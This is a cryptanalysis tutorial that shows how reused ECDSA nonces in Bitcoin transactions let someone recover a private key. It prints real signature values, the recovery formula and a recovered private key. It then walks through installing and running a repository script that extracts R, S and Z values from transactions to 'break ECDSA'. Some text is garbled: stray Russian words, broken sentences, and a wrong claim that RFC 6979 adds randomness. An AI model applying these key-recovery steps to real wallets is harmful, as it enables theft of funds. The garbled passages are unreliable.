In this article, we will talk about extracting signature values ECDSA R, S, Z
from the Bitcoin blockchain, but first, let’s remember the very first serious vulnerability in the blockchain transaction that was discovered by Niels Schneider ( Nils Schneider
aka tcatm )
Bitcoin developer and owner of “BitcoinWatch” & “BitcoinCharts”.
Document
[PDF]
: Private Key Recovery Combination Attacks: On Extreme Fragility of Popular Bitcoin Key Management, Wallet and Cold Storage Solutions in Presence of Poor RNG Events
On December 25, 2012, Nils discovered a potential weakness in some Bitcoin blockchain transactions.
Look at this transaction:
transaction:
9ec4bc49e828d924af1d1029cacf709431abbde46d59554b62bc270e3b29c4b1
input script 1:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e0104dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff
input script 2:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab0104dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff
This transaction has two inputs and one output.
If you look closely at the two input scripts, you will notice that there are quite a few identical bytes at the beginning and at the end.
Those bytes at the end are the hex encoded public key of the address the coins are being spent on, so there’s nothing wrong with that.
However, the first half of the script is the actual signature (r, s)
:
r1: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
r2: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
s1: 44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
s2: 9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab
As you can see, it’s
r1
the samer2
. This is a huge problem .
We can restore the private key to this public key:
04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff
To do this, we can use a simple formula from school algebra ????
private key = (z1*s2 - z2*s1)/(r*(s1-s2))
We just need to find z1
and z2
These are хэши
the outputs that need to be signed. Let’s get the output transactions and count them (computed by OP_CHECKSIG
):
z1: c0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
z2: 17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc
Next, we pack all these values in one Python – script: vulnerabilityR.py
p
is just an order of magnitude G
, a parameter of the curve secp256k1
used by Bitcoin.
Let’s create a field for our calculations:
K = GF(p)
K((z1*s2 - z2*s1)/(r*(s1-s2)))
Let’s run the script: python3 vulnerabilityR.py
Next, our script: vulnerabilityR.py will calculate the private key in this field:
ADDR: 1BFhrfTTZP3Nw4BNy4eX4KFLsn9ZeijcMm
WIF: 5KJp7KEffR7HHFWSFYjiCUAntRSTY69LAQEX1AUzaSBHHFdKEpQ
hex: c477f9f65c22cce20657faa5b2d1d8122336f851a508a1ed04e479c34985bf96
Private key found!
https://www.blockchain.com/btc/address/1BFhrfTTZP3Nw4BNy4eX4KFLsn9ZeijcMm
Of course, the developers of Bitcoin fixed this vulnerability by introducing deterministic functions.
This feature
RFC 6979
introduces an element of randomness into the Bitcoin signature, which enhances the cryptographic strength of the transaction.ECDSA
Document [PDF]
: RFC 6979: Deterministic Usage of the Digital Signature Algorithm (DSA) and Elliptic Curve Digital Signature Algorithm (ECDSA)
As we know in practice, there are completely different vulnerable transactions in the Bitcoin blockchain.
We previously posted
статью
: “One weak transaction in ECDSA on the Bitcoin blockchain and with the help of Lattice Attack we received a Private Key to BTC coins”
Now let’s get the public key Bitcoin
ECDSA
and value ourselves R, S, Z
from the “RawTX.json” file (which we got in 01BlockchainGoogleDrive )
- To do this, use the Terminal for Google Colab [ TerminalGoogleColab]
- Earlier I recorded a video: “TERMINAL in Google Colab creating all the conveniences for working in GITHUB”
- Let’s go through the “CryptoDeepTools” repository for a detailed cryptanalysis and take a closer look at how the Bash script works : getsign.sh
git clone https://github.com/demining/CryptoDeepTools.git
cd CryptoDeepTools/02BreakECDSAcryptography/
sudo apt install python2-minimal
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2 get-pip.py
pip2 install -r requirements.txt
chmod +x getsign.sh
./getsign.sh
And so let’s take a look at the whole work of the Bash script in detail : getsign.sh
cat RawTX.json > index.json
Making a copy of a file RawTX.json
into a new file index.json
for run in {1..4}; do
We open it because we take 4 linesЦИКЛ
in the file index.json
{1..4}
export LINE=1 ; sed -n "${LINE}p" index.json > index2.json
The utility export
takes line #1 and saves it in a new file index2.json
sed -i '1d' index.json
The utility sed
removes line #1 from the file index.json
python3 fileopen.py
We run the Python script fileopen.py
and successfully creates a new Bash script : signscript.sh
chmod +x signscript.sh
./signscript.sh
We get the rights to the Bash script : signscript.sh
As a result, the breakECDSA.py Python script is launched, which eventually extracts the value and public key of Bitcoin from
RawTX
R, S, Z
All this is saved to a file:
"signatures.json"
rm signscript.sh
rm fileopen.py
The utility rm
removes the Python script fileopen.py
and successfully creates a new Bash script : signscript.sh
done
As a result, everything will end after 4 cycles
rm index.json
The cycle closes and the utility rm
deletes index.json
Bash script : getsign.sh Завершает работу!
Now we have learned:
- Get public key
Bitcoin
fromECDSA
- Get value
R, S, Z
fromECDSA
- Apply it for
криптоанализа
Source code: https://github.com/demining/CryptoDeepTools/blob/main/02BreakECDSAcryptography
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/BYd-cuFRZmM